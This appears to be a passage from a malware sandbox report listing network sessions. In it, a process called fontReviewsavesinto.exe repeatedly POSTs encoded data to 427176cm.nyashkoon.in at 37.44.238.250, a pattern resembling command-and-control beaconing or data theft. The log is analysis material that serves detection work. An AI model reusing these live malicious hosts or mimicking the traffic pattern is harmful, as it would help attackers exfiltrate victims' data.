                                        Data Ascii: ^]F]YTZT^^TUV\Z]_PYYR]RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%!,Z'="'$;8[)&<Y'<>=&3)$.$$( >&G!']*?
                                        Nov 5, 2024 08:14:03.281985044 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:03.368546963 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        122 | 192.168.2.7 | 50092 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:03.507064104 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:03.865230083 CET1028OUTData Raw: 5e 5d 43 52 5c 5f 5a 5d 5e 5e 54 55 56 5a 5a 58 5f 5a 59 51 52 5d 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CR\_Z]^^TUVZZX_ZYQR]R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F$"$3-'_/]3*5;%,,>1'$+%;?[+:&G!']*#
                                        Nov 5, 2024 08:14:04.965688944 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:04.965708971 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:14:04.965718985 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:14:04.965725899 CET | 183 | IN | HTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 30 35 20 4e 6f 76 20 32 30 32 34 20 30 37 3a 31 34 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3f 5d 40 56
                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Nov 2024 07:14:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        123 | 192.168.2.7 | 50093 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:05.115104914 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:05.474097967 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:05.918174028 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:05.999053001 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        124         192.168.2.7  50094        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:06.134085894 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        125         192.168.2.7  50095        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:06.168360949 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:06.520967960 CET  1300               OUT        [request body]
                                        Nov 5, 2024 08:14:06.979485989 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:07.063622952 CET  308                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        126         192.168.2.7  50096        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:06.292412996 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:06.645936012 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:07.142740011 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:07.219276905 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        127         192.168.2.7  50097        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:07.354553938 CET  287                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:07.708811998 CET  1028               OUT        [request body]
                                        Nov 5, 2024 08:14:08.196516991 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:08.269507885 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        128         192.168.2.7  50098        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:08.416724920 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:08.770930052 CET  1028               OUT        [request body]
                                        Nov 5, 2024 08:14:09.236253977 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:09.319180012 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        129         192.168.2.7  50099        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:09.463201046 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:09.817910910 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:10.275799990 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:10.351743937 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        130         192.168.2.7  50101        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:10.604638100 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:10.958441019 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:11.414113998 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:11.484186888 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        131         192.168.2.7  50102        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:11.902817011 CET  287                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        132         192.168.2.7  50103        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:12.075975895 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:12.429265022 CET  1300               OUT        [request body]
                                        Nov 5, 2024 08:14:12.886993885 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:12.961757898 CET  308                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        133         192.168.2.7  50104        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:12.207422972 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:12.552289963 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:13.052994967 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:13.134260893 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        134         192.168.2.7  50105        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:13.263816118 CET  287                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:13.615267992 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:14.075562954 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:14.147263050 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        135         192.168.2.7  50106        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:14.298217058 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:14.650223970 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:15.116183043 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:15.191181898 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        136         192.168.2.7  50107        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:15.329468966 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:15.677252054 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:16.140888929 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:16.225965977 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        137         192.168.2.7  50108        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:16.360526085 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:16.712296009 CET  1032               OUT        [request body]
                                        Nov 5, 2024 08:14:17.169964075 CET  25                 IN         HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:17.248447895 CET  158                IN         HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        138         192.168.2.7  50109        37.44.238.250   80                7392  C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp                           Bytes transferred  Direction  Data
                                        Nov 5, 2024 08:14:17.386255980 CET  311                OUT        POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:17.739690065 CET  1032               OUT        [request body]


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        139 | 192.168.2.7 | 50110 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:17.980673075 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:18.333393097 CET1300OUTData Raw: 5b 5e 46 5e 5c 59 5a 54 5e 5e 54 55 56 5c 5a 5b 5f 52 59 59 52 5d 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^F^\YZT^^TUV\Z[_RYYR]R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B0/0-\0"/ ^)%#38(.>W0?.$_$;]=&G!']*?
                                        Nov 5, 2024 08:14:18.783237934 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:18.858599901 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 33 06 2c 55 20 5c 3e 51 3c 3e 3c 5b 36 27 3f 59 2c 3d 06 5b 33 33 34 54 2a 2f 08 19 20 29 39 03 21 3d 34 14 20 07 2b 57 3e 31 2f 5a 07 10 25 1e 25 22 05 55 31 00 0a 5e 24 20 3b 5c 2a 3f 20 5b 36 2b 0d 5c 25 38 25 11 31 03 3b 14 38 39 0c 0a 2f 3b 2f 5c 3a 32 23 07 26 34 2c 54 0d 10 3a 0a 28 21 0e 1f 3e 5a 21 5d 26 37 20 56 22 2e 27 59 29 5c 33 08 3c 03 2e 5d 33 0e 30 57 21 0c 2e 0b 25 28 38 5c 33 0f 0e 15 26 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :3,U \>Q<><[6'?Y,=[334T*/ )9!=4 +W>1/Z%%"U1^$ ;\*? [6+\%8%1;89/;/\:2#&4,T:(!>Z!]&7 V".'Y)\3<.]30W!.%(8\3&%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        140 | 192.168.2.7 | 50111 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:18.106998920 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:18.458550930 CET1032OUTData Raw: 5b 5b 43 58 5c 5d 5f 51 5e 5e 54 55 56 58 5a 5f 5f 53 59 5a 52 58 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[CX\]_Q^^TUVXZ__SYZRXRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$!,Y$028];; ?%00/7)=3'=?_$+4)&G!']*/
                                        Nov 5, 2024 08:14:18.927289963 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:19.011384010 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        141 | 192.168.2.7 | 50112 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:19.138098955 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:19.489861012 CET1032OUTData Raw: 5b 5c 46 5e 59 5b 5f 55 5e 5e 54 55 56 53 5a 50 5f 52 59 5d 52 50 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\F^Y[_U^^TUVSZP_RY]RPRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.010Y31$T;/8<=C8$/4(>"T$&X'.408;)*&G!']*
                                        Nov 5, 2024 08:14:19.941071033 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:20.016305923 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        142 | 192.168.2.7 | 50113 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:20.153501987 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:20.505295038 CET1032OUTData Raw: 5b 5f 43 5c 59 55 5a 5d 5e 5e 54 55 56 5b 5a 51 5f 5a 59 5f 52 5a 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
